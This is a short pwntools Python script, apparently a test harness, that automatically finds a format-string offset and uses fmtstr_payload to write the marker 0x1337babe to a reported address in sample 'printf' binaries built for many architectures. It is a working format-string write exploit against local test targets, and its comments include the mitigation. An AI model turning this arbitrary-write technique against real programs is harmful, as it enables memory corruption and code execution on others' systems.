#!/usr/bin/env python
from pwn import *

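@context.quiet
def exec_fmt(payload):
    """Run the target once with *payload* and return everything it prints.

    Passed to ``FmtStr`` as its execution callback. Each call starts a fresh
    process of ``context.binary``; ``@context.quiet`` silences pwntools
    logging for the duration of the call.
    """
    # The with-block closes the process even if sendline()/recvall() raises,
    # matching how exploit() manages its process.
    with context.binary.process() as p:
        p.sendline(payload)
        # recvall() reads until EOF, i.e. until the target exits.
        return p.recvall()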

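def exploit(binary):
    """Exercise the format-string write primitive against one test binary.

    Loads *binary* as ``context.binary`` (which also selects architecture,
    word size and endianness), lets ``FmtStr`` determine the argument offset
    via ``exec_fmt``, then starts a fresh process, writes the marker
    ``0x1337babe`` to the address the process reports, and prints the 32-bit
    value the process sends back after ``DONE``.

    NOTE(review): the protocol (pointer-sized address first, then ``DONE``
    followed by four bytes) is inferred from the reads below; the target's
    source is not part of this file. Targets like this presumably pass the
    input line to printf as the format string; production code avoids the
    bug class with a constant format (``printf("%s", buf)``) and
    ``-Wformat-security``.
    """
    context.binary = ELF(binary)
    autofmt = FmtStr(exec_fmt)
    offset = autofmt.offset
    with context.binary.process() as p:
        # recvn() waits for exactly the requested number of bytes; recv(n)
        # may return fewer, which makes unpack() fail on a short pipe read.
        addr = unpack(p.recvn(context.bytes))
        # p32() honours context endianness, so the marker is written in the
        # target's byte order and u32() below decodes it the same way.
        payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
        p.sendline(payload)
        p.recvuntil(b"DONE")
        # Expected to print 0x1337babe when the write landed.
        print(hex(u32(p.recvn(4))))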

# Targets to run: paths given on the command line take precedence; with no
# arguments, fall back to one build of the printf sample per architecture.
binaries = sys.argv[1:] or [
    "printf.mips",
    "printf.mips64",
    "printf.mipsel",
    "printf.mips64el",
    "printf.native",
    "printf.native32",
    "printf.ppc",
    "printf.ppc64",
    "printf.sparc64",
    "printf.arm",
    "printf.aarch64",
]

# Each target is processed independently; exploit() resets context.binary.
for binary in binaries:
    exploit(binary)
